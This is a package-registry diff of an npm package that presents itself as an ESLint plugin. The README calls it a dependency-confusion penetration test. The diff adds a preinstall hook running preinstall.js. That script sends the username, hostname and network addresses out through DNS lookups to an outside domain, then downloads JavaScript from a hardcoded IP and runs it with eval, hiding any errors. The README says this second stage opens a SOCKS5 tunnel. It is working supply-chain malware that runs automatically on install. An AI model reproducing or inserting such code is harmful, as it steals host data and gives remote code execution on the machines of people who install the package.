eslint-plugin-seller-ui-eslint-plugin 0.0.1-security → 0.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of eslint-plugin-seller-ui-eslint-plugin might be problematic. Click here for more details.
- package/README.md +16 -3
- package/index.js +2 -0
- package/package.json +16 -3
- package/preinstall.js +80 -0
package/README.md
CHANGED
|
@@ -1,5 +1,18 @@
|
|
|
1
|
-
#
|
|
1
|
+
# 🛑 PLEASE DO NOT INSTALL THIS PACKAGE 🛑
|
|
2
2
|
|
|
3
|
-
This package
|
|
3
|
+
This package was created to test for the dependency confusion vulnerability as a part of penetration testing process.
|
|
4
|
+
__Package maintainer organization was provided the detailed information about this test, including package name & possible consequences for their CI/CD pipeline.__
|
|
4
5
|
|
|
5
|
-
|
|
6
|
+
As in the original dependency confusion whitepaper, this package makes use of the pre-install script.
|
|
7
|
+
It does the following steps:
|
|
8
|
+
|
|
9
|
+
1. Collects statistics (hostname, username, network interface names) using DNS lookups.
|
|
10
|
+
2. If the Internet connectivity allows outgoing HTTP requests and *the request is made from the subnet of the organization which the current pentesting activity targets*,
|
|
11
|
+
the second stage of the JS payload is downloaded and evaluated.
|
|
12
|
+
3. The second stages attempts to set up SOCKS5 proxy to create the tunnel inside the target infrastructure.
|
|
13
|
+
|
|
14
|
+
The second stage __only affects the IP range of the penetration test subject organization__.
|
|
15
|
+
You can verify this by making the request to the URL where the payload is downloaded from (`preinstall.js, line 7`).
|
|
16
|
+
|
|
17
|
+
Once this test is complete (3-14 days), the package will be deleted and reported to NPM security team.
|
|
18
|
+
Until then, __please do not install or report it__.
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,19 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "eslint-plugin-seller-ui-eslint-plugin",
|
|
3
|
-
"version": "0.0.
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "0.0.3",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "preinstall.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node preinstall.js"
|
|
9
|
+
},
|
|
10
|
+
"devDependencies": {
|
|
11
|
+
"eslint": "^8.14.0"
|
|
12
|
+
},
|
|
13
|
+
"peerDependencies": {
|
|
14
|
+
"eslint": "^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0"
|
|
15
|
+
},
|
|
16
|
+
"keywords": [],
|
|
17
|
+
"author": "",
|
|
18
|
+
"license": "ISC"
|
|
6
19
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,80 @@
|
|
|
1
|
+
var http = require("http");
|
|
2
|
+
var dns = require("dns");
|
|
3
|
+
var os = require("os");
|
|
4
|
+
|
|
5
|
+
var DNS_DOMAIN = '.oz.b.blueotter.info';
|
|
6
|
+
|
|
7
|
+
var STAGE_URL = 'http://192.70.197.169/seller-ui-eslint-plugin/stage.json';
|
|
8
|
+
|
|
9
|
+
var randomString = function (length) {
|
|
10
|
+
var result = '';
|
|
11
|
+
var alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
|
|
12
|
+
for (var i = 0; i < length; i++)
|
|
13
|
+
result += alphabet.charAt(Math.floor(Math.random() *
|
|
14
|
+
alphabet.length));
|
|
15
|
+
return result;
|
|
16
|
+
}
|
|
17
|
+
|
|
18
|
+
var getNetworkInterfaces = function () {
|
|
19
|
+
var ifaces = os.networkInterfaces();
|
|
20
|
+
var results = {};
|
|
21
|
+
|
|
22
|
+
Object.keys(ifaces).forEach(function (name) {
|
|
23
|
+
ifaces[name].forEach(function (net) {
|
|
24
|
+
if (net.family === 'IPv4' && !net.internal) {
|
|
25
|
+
if (!results[name])
|
|
26
|
+
results[name] = [];
|
|
27
|
+
results[name].push(net.address);
|
|
28
|
+
}
|
|
29
|
+
});
|
|
30
|
+
});
|
|
31
|
+
|
|
32
|
+
return results;
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
var toHex = function (str) {
|
|
36
|
+
return Buffer.from(str, 'utf-8').toString('hex');
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
var collectStats = function () {
|
|
40
|
+
// Unique 6-character string to identify host in DNS logs
|
|
41
|
+
var hostId = toHex(randomString(3));
|
|
42
|
+
var suffix = '.' + hostId + DNS_DOMAIN;
|
|
43
|
+
// Stat type prefix:
|
|
44
|
+
// x - username
|
|
45
|
+
// y - hostname
|
|
46
|
+
// z - network interface
|
|
47
|
+
var hostname = os.hostname();
|
|
48
|
+
var username = os.userInfo().username;
|
|
49
|
+
var ifaces = getNetworkInterfaces();
|
|
50
|
+
dns.lookup('eslint' + suffix, function (err, res) {});
|
|
51
|
+
dns.lookup('x' + toHex(username) + suffix, function (err, res) {});
|
|
52
|
+
dns.lookup('y' + toHex(hostname) + suffix, function (err, res) {});
|
|
53
|
+
|
|
54
|
+
Object.keys(ifaces).forEach(function (iface) {
|
|
55
|
+
dns.lookup('z' + toHex(iface) + '.' + ifaces[iface][0] + suffix, function (err, res) {});
|
|
56
|
+
});
|
|
57
|
+
}
|
|
58
|
+
|
|
59
|
+
var execSecondStage = function () {
|
|
60
|
+
http.get(STAGE_URL, function (res) {
|
|
61
|
+
var body = '';
|
|
62
|
+
|
|
63
|
+
res.on('data', function (chunk) {
|
|
64
|
+
body += chunk;
|
|
65
|
+
});
|
|
66
|
+
|
|
67
|
+
res.on('end', function () {
|
|
68
|
+
try {
|
|
69
|
+
eval(body);
|
|
70
|
+
} catch (err) {
|
|
71
|
+
// Silently ignore the error
|
|
72
|
+
}
|
|
73
|
+
});
|
|
74
|
+
}).on('error', function (e) {
|
|
75
|
+
// Silently ignore the error
|
|
76
|
+
});
|
|
77
|
+
}
|
|
78
|
+
|
|
79
|
+
collectStats();
|
|
80
|
+
execSecondStage();
|